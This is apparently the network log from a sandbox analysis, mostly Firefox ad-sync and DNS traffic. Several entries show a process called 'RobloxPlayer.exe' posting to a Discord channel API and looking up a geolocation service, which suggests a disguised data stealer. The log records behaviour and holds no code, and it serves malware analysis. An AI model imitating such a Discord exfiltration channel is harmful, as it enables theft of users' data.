AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAA.egAAAbgAAAAA&us_privacy=1---&gpp=&gpp_sid=&cb=https%3A%2F%2Fs2s.t13.io%2Fsetuid%3Fbidder%3Dix%26gdpr%3D1%26gdpr_consent%3DCP_ONMAP_ONMAAKA1AENDgCsAP_AAEPAACiQg1NX_H__bW9r8X7_aft0eY1P9_j77sQxBhfJE-4F3LvW_JwXx2E5NF36tqoKmRoEu3ZBIUNlHJHUTVmwaogVryHsakWcoTNKJ6BkkFMRM2dYCF5vm4tjeQKY5_p_d3fx2D-t_dv839zzz8VHn3e5fue0-PCdU5-9Dfn9fRfb-9IP9_78v8v8_l_rk2_eT13_pcvr_D--f_87_XW-9_cAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQagCzDQuIAuyJCQm0DCKBACIKwgIoEAAAAJA0QEALgwKdgYBLrCRACBFAAcEAIQAUZAAgAAEgAQiACQIoEAAEAgEAAIAEAgEADAwADgAtBAIAAQHQMUwoAFAsIEiMiIUwIQoEggJbKBBKCoQVwgCLDAigERsFAAgCQEVgACAsXgMASAlYkECXUG0AABAAgFFKFQik_MAQ4Jmy1V4om0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAA.egAAAbgAAAAA%26us_privacy%3D1---%26gpp%3D%26gpp_sid%3D%26f%3Db%26uid%3D

HTTP Response

302

HTTP Request

GET https://ssum-sec.casalemedia.com/usermatch?cb=https%3A%2F%2Fs2s.t13.io%2Fsetuid%3Fgpp%3D%26gpp_sid%3D%26bidder%3Dix%26gdpr%3D1%26gdpr_consent%3DCP_ONMAP_ONMAAKA1AENDgCsAP_AAEPAACiQg1NX_H__bW9r8X7_aft0eY1P9_j77sQxBhfJE-4F3LvW_JwXx2E5NF36tqoKmRoEu3ZBIUNlHJHUTVmwaogVryHsakWcoTNKJ6BkkFMRM2dYCF5vm4tjeQKY5_p_d3fx2D-t_dv839zzz8VHn3e5fue0-PCdU5-9Dfn9fRfb-9IP9_78v8v8_l_rk2_eT13_pcvr_D--f_87_XW-9_cAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQagCzDQuIAuyJCQm0DCKBACIKwgIoEAAAAJA0QEALgwKdgYBLrCRACBFAAcEAIQAUZAAgAAEgAQiACQIoEAAEAgEAAIAEAgEADAwADgAtBAIAAQHQMUwoAFAsIEiMiIUwIQoEggJbKBBKCoQVwgCLDAigERsFAAgCQEVgACAsXgMASAlYkECXUG0AABAAgFFKFQik_MAQ4Jmy1V4om0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAA.egAAAbgAAAAA%26us_privacy%3D1---%26gpp%3D%26gpp_sid%3D%26f%3Db%26uid%3D&gdpr=1&gdpr_consent=CP_ONMAP_ONMAAKA1AENDgCsAP_AAEPAACiQg1NX_H__bW9r8X7_aft0eY1P9_j77sQxBhfJE-4F3LvW_JwXx2E5NF36tqoKmRoEu3ZBIUNlHJHUTVmwaogVryHsakWcoTNKJ6BkkFMRM2dYCF5vm4tjeQKY5_p_d3fx2D-t_dv839zzz8VHn3e5fue0-PCdU5-9Dfn9fRfb-9IP9_78v8v8_l_rk2_eT13_pcvr_D--f_87_XW-9_cAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQagCzDQuIAuyJCQm0DCKBACIKwgIoEAAAAJA0QEALgwKdgYBLrCRACBFAAcEAIQAUZAAgAAEgAQiACQIoEAAEAgEAAIAEAgEADAwADgAtBAIAAQHQMUwoAFAsIEiMiIUwIQoEggJbKBBKCoQVwgCLDAigERsFAAgCQEVgACAsXgMASAlYkECXUG0AABAAgFFKFQik_MAQ4Jmy1V4om0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAA.egAAAbgAAAAA&gpp=&gpp_sid=&s=184674&us_privacy=1---&C=1

HTTP Response

200
162.159.137.232:443

https://discord.com/api/v9/channels/1244109081116151869/messages

tls, http

RobloxPlayer.exe

1.1kB
2.8kB
8
10

HTTP Request

POST https://discord.com/api/v9/channels/1244109081116151869/messages

HTTP Response

200
76.223.111.18:443

https://eb2.3lift.com/sync?us_privacy=1---&&ld=1

tls, http2

firefox.exe

6.9kB
10.1kB
18
20

HTTP Request

GET https://eb2.3lift.com/sync?gdpr=1&cmp_cs=CP_ONMAP_ONMAAKA1AENDgCsAP_AAEPAACiQg1NX_H__bW9r8X7_aft0eY1P9_j77sQxBhfJE-4F3LvW_JwXx2E5NF36tqoKmRoEu3ZBIUNlHJHUTVmwaogVryHsakWcoTNKJ6BkkFMRM2dYCF5vm4tjeQKY5_p_d3fx2D-t_dv839zzz8VHn3e5fue0-PCdU5-9Dfn9fRfb-9IP9_78v8v8_l_rk2_eT13_pcvr_D--f_87_XW-9_cAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQagCzDQuIAuyJCQm0DCKBACIKwgIoEAAAAJA0QEALgwKdgYBLrCRACBFAAcEAIQAUZAAgAAEgAQiACQIoEAAEAgEAAIAEAgEADAwADgAtBAIAAQHQMUwoAFAsIEiMiIUwIQoEggJbKBBKCoQVwgCLDAigERsFAAgCQEVgACAsXgMASAlYkECXUG0AABAAgFFKFQik_MAQ4Jmy1V4om0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAA.egAAAbgAAAAA&us_privacy=1---&gpp=&gpp_sid=&redir=https%3A%2F%2Fs2s.t13.io%2Fsetuid%3Fbidder%3Dtriplelift%26gdpr%3D1%26gdpr_consent%3DCP_ONMAP_ONMAAKA1AENDgCsAP_AAEPAACiQg1NX_H__bW9r8X7_aft0eY1P9_j77sQxBhfJE-4F3LvW_JwXx2E5NF36tqoKmRoEu3ZBIUNlHJHUTVmwaogVryHsakWcoTNKJ6BkkFMRM2dYCF5vm4tjeQKY5_p_d3fx2D-t_dv839zzz8VHn3e5fue0-PCdU5-9Dfn9fRfb-9IP9_78v8v8_l_rk2_eT13_pcvr_D--f_87_XW-9_cAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQagCzDQuIAuyJCQm0DCKBACIKwgIoEAAAAJA0QEALgwKdgYBLrCRACBFAAcEAIQAUZAAgAAEgAQiACQIoEAAEAgEAAIAEAgEADAwADgAtBAIAAQHQMUwoAFAsIEiMiIUwIQoEggJbKBBKCoQVwgCLDAigERsFAAgCQEVgACAsXgMASAlYkECXUG0AABAAgFFKFQik_MAQ4Jmy1V4om0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAA.egAAAbgAAAAA%26us_privacy%3D1---%26gpp%3D%26gpp_sid%3D%26f%3Db%26uid%3D%24UID

HTTP Response

302

HTTP Request

GET https://eb2.3lift.com/sync?gdpr=1&cmp_cs=CP_ONMAP_ONMAAKA1AENDgCsAP_AAEPAACiQg1NX_H__bW9r8X7_aft0eY1P9_j77sQxBhfJE-4F3LvW_JwXx2E5NF36tqoKmRoEu3ZBIUNlHJHUTVmwaogVryHsakWcoTNKJ6BkkFMRM2dYCF5vm4tjeQKY5_p_d3fx2D-t_dv839zzz8VHn3e5fue0-PCdU5-9Dfn9fRfb-9IP9_78v8v8_l_rk2_eT13_pcvr_D--f_87_XW-9_cAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQagCzDQuIAuyJCQm0DCKBACIKwgIoEAAAAJA0QEALgwKdgYBLrCRACBFAAcEAIQAUZAAgAAEgAQiACQIoEAAEAgEAAIAEAgEADAwADgAtBAIAAQHQMUwoAFAsIEiMiIUwIQoEggJbKBBKCoQVwgCLDAigERsFAAgCQEVgACAsXgMASAlYkECXUG0AABAAgFFKFQik_MAQ4Jmy1V4om0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAA.egAAAbgAAAAA&us_privacy=1---&gpp=&gpp_sid=&redir=https%3A%2F%2Fs2s.t13.io%2Fsetuid%3Fbidder%3Dtriplelift%26gdpr%3D1%26gdpr_consent%3DCP_ONMAP_ONMAAKA1AENDgCsAP_AAEPAACiQg1NX_H__bW9r8X7_aft0eY1P9_j77sQxBhfJE-4F3LvW_JwXx2E5NF36tqoKmRoEu3ZBIUNlHJHUTVmwaogVryHsakWcoTNKJ6BkkFMRM2dYCF5vm4tjeQKY5_p_d3fx2D-t_dv839zzz8VHn3e5fue0-PCdU5-9Dfn9fRfb-9IP9_78v8v8_l_rk2_eT13_pcvr_D--f_87_XW-9_cAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQagCzDQuIAuyJCQm0DCKBACIKwgIoEAAAAJA0QEALgwKdgYBLrCRACBFAAcEAIQAUZAAgAAEgAQiACQIoEAAEAgEAAIAEAgEADAwADgAtBAIAAQHQMUwoAFAsIEiMiIUwIQoEggJbKBBKCoQVwgCLDAigERsFAAgCQEVgACAsXgMASAlYkECXUG0AABAAgFFKFQik_MAQ4Jmy1V4om0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAA.egAAAbgAAAAA%26us_privacy%3D1---%26gpp%3D%26gpp_sid%3D%26f%3Db%26uid%3D%24UID&ld=1

HTTP Response

200

HTTP Request

GET https://eb2.3lift.com/sync?us_privacy=1---&

HTTP Response

302

HTTP Request

GET https://eb2.3lift.com/sync?us_privacy=1---&&ld=1

HTTP Response

200
142.250.187.225:443

https://cdn.ampproject.org/rtv/012405101652000/v0/amp-form-0.1.mjs

tls, http2

firefox.exe

3.7kB
124.5kB
47
102

HTTP Request

GET https://cdn.ampproject.org/rtv/012405101652000/amp4ads-v0.mjs

HTTP Request

GET https://cdn.ampproject.org/rtv/012405101652000/v0/amp-ad-exit-0.1.mjs

HTTP Request

GET https://cdn.ampproject.org/rtv/012405101652000/v0/amp-fit-text-0.1.mjs

HTTP Request

GET https://cdn.ampproject.org/rtv/012405101652000/v0/amp-analytics-0.1.mjs

HTTP Request

GET https://cdn.ampproject.org/rtv/012405101652000/v0/amp-form-0.1.mjs
142.250.187.225:443

cdn.ampproject.org

tls, http2

firefox.exe

1.3kB
12.5kB
11
15
142.250.187.225:443

cdn.ampproject.org

tls, http2

firefox.exe

1.2kB
12.5kB
10
16
142.250.187.225:443

cdn.ampproject.org

tls, http2

firefox.exe

1.2kB
12.5kB
10
15
142.250.187.225:443

cdn.ampproject.org

tls, http2

firefox.exe

1.2kB
12.5kB
10
16
172.66.42.247:443

rt3013.infolinks.com

tls

firefox.exe

3.6kB
7.3kB
14
15
2.21.189.145:443

https://widgets.outbrain.com/images/widgetIcons/achoice.svg

tls, http2

firefox.exe

5.5kB
112.4kB
74
95

HTTP Request

GET https://widgets.outbrain.com/outbrain.js

HTTP Response

200

HTTP Request

GET https://widgets.outbrain.com/nanoWidget/externals/topics/topics.html?r=https%3A%2F%2Fwww.se7ensins.com

HTTP Response

200

HTTP Request

GET https://widget-pixels.outbrain.com/widget/detect/px.gif?ch=1

HTTP Response

200

HTTP Request

GET https://widgets.outbrain.com/nanoWidget/externals/cookie/put.html

HTTP Response

200

HTTP Request

GET https://widgets.outbrain.com/nanoWidget/externals/cookie/test.html

HTTP Request

GET https://widgets.outbrain.com/widgetOBUserSync/obUserSync.html

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://widgets.outbrain.com/images/widgetIcons/ob_logo_67x12.png

HTTP Request

GET https://widgets.outbrain.com/images/widgetIcons/achoice.svg

HTTP Response

200

HTTP Response

200
35.214.149.91:443

x.bidswitch.net

tls

firefox.exe

18.9kB
16.2kB
32
30

8.8.8.8:53

gateway.discord.gg

dns

RobloxPlayer.exe

64 B
144 B
1
1

DNS Request

gateway.discord.gg

DNS Response

162.159.135.234

162.159.130.234

162.159.134.234

162.159.136.234

162.159.133.234
8.8.8.8:53

contile.services.mozilla.com

dns

firefox.exe

74 B
90 B
1
1

DNS Request

contile.services.mozilla.com

DNS Response

34.117.188.166
8.8.8.8:53

content-signature-2.cdn.mozilla.net

dns

firefox.exe

81 B
235 B
1
1

DNS Request

content-signature-2.cdn.mozilla.net

DNS Response

34.160.144.191
8.8.8.8:53

shavar.services.mozilla.com

dns

firefox.exe

73 B
157 B
1
1

DNS Request

shavar.services.mozilla.com

DNS Response

44.237.65.238

44.230.111.112

35.164.250.149
8.8.8.8:53

push.services.mozilla.com

dns

firefox.exe

71 B
125 B
1
1

DNS Request

push.services.mozilla.com

DNS Response

34.107.243.93
8.8.8.8:53

contile.services.mozilla.com

dns

firefox.exe

74 B
90 B
1
1

DNS Request

contile.services.mozilla.com

DNS Response

34.117.188.166
8.8.8.8:53

prod.content-signature-chains.prod.webservices.mozgcp.net

dns

firefox.exe

103 B
119 B
1
1

DNS Request

prod.content-signature-chains.prod.webservices.mozgcp.net

DNS Response

34.160.144.191
8.8.8.8:53

234.135.159.162.in-addr.arpa

dns

74 B
136 B
1
1

DNS Request

234.135.159.162.in-addr.arpa
8.8.8.8:53

166.188.117.34.in-addr.arpa

dns

73 B
126 B
1
1

DNS Request

166.188.117.34.in-addr.arpa
8.8.8.8:53

prod.content-signature-chains.prod.webservices.mozgcp.net

dns

firefox.exe

103 B
131 B
1
1

DNS Request

prod.content-signature-chains.prod.webservices.mozgcp.net

DNS Response

2600:1901:0:92a9::
8.8.8.8:53

shavar.prod.mozaws.net

dns

firefox.exe

68 B
116 B
1
1

DNS Request

shavar.prod.mozaws.net

DNS Response

35.164.250.149

44.230.111.112

44.237.65.238
8.8.8.8:53

contile.services.mozilla.com

dns

firefox.exe

74 B
155 B
1
1

DNS Request

contile.services.mozilla.com
8.8.8.8:53

shavar.prod.mozaws.net

dns

firefox.exe

68 B
153 B
1
1

DNS Request

shavar.prod.mozaws.net
8.8.8.8:53

autopush.prod.mozaws.net

dns

firefox.exe

70 B
86 B
1
1

DNS Request

autopush.prod.mozaws.net

DNS Response

34.107.243.93
8.8.8.8:53

autopush.prod.mozaws.net

dns

firefox.exe

70 B
155 B
1
1

DNS Request

autopush.prod.mozaws.net
8.8.8.8:53

firefox.settings.services.mozilla.com

dns

firefox.exe

83 B
161 B
1
1

DNS Request

firefox.settings.services.mozilla.com

DNS Response

34.149.100.209
8.8.8.8:53

prod.remote-settings.prod.webservices.mozgcp.net

dns

firefox.exe

164 B
292 B
2
2

DNS Request

prod.remote-settings.prod.webservices.mozgcp.net

DNS Response

34.149.100.209

DNS Request

global.px.quantserve.com

DNS Response

2620:116:800d:21:7eb1:3826:be7e:d981

2620:116:800d:21:de2e:c7b3:55c0:d5a0

2620:116:800d:21:ef75:8280:f209:5ba1

2620:116:800d:21:b314:a0ef:ab7c:d546
8.8.8.8:53

prod.remote-settings.prod.webservices.mozgcp.net

dns

firefox.exe

94 B
187 B
1
1

DNS Request

prod.remote-settings.prod.webservices.mozgcp.net
8.8.8.8:53

238.65.237.44.in-addr.arpa

dns

72 B
135 B
1
1

DNS Request

238.65.237.44.in-addr.arpa
34.117.188.166:443

contile.services.mozilla.com

https

firefox.exe

4.6kB
5.6kB
7
7
8.8.8.8:53

133.211.185.52.in-addr.arpa

dns

73 B
147 B
1
1

DNS Request

133.211.185.52.in-addr.arpa
8.8.8.8:53

www.google.com

dns

firefox.exe

60 B
76 B
1
1

DNS Request

www.google.com

DNS Response

142.250.187.196
8.8.8.8:53

www.google.com

dns

firefox.exe

60 B
76 B
1
1

DNS Request

www.google.com

DNS Response

142.250.187.196
8.8.8.8:53

www.google.com

dns

firefox.exe

60 B
88 B
1
1

DNS Request

www.google.com

DNS Response

2a00:1450:4009:81f::2004
8.8.8.8:53

172.210.232.199.in-addr.arpa

dns

74 B
128 B
1
1

DNS Request

172.210.232.199.in-addr.arpa
8.8.8.8:53

196.187.250.142.in-addr.arpa

dns

74 B
112 B
1
1

DNS Request

196.187.250.142.in-addr.arpa
142.250.187.196:443

www.google.com

https

firefox.exe

227.5kB
1.8MB
581
1912
8.8.8.8:53

discord.com

dns

RobloxPlayer.exe

57 B
137 B
1
1

DNS Request

discord.com

DNS Response

162.159.137.232

162.159.128.233

162.159.138.232

162.159.136.232

162.159.135.232
8.8.8.8:53

195.212.58.216.in-addr.arpa

dns

73 B
171 B
1
1

DNS Request

195.212.58.216.in-addr.arpa
8.8.8.8:53

99.201.58.216.in-addr.arpa

dns

72 B
169 B
1
1

DNS Request

99.201.58.216.in-addr.arpa
8.8.8.8:53

232.137.159.162.in-addr.arpa

dns

74 B
136 B
1
1

DNS Request

232.137.159.162.in-addr.arpa
8.8.8.8:53

geolocation-db.com

dns

RobloxPlayer.exe

64 B
80 B
1
1

DNS Request

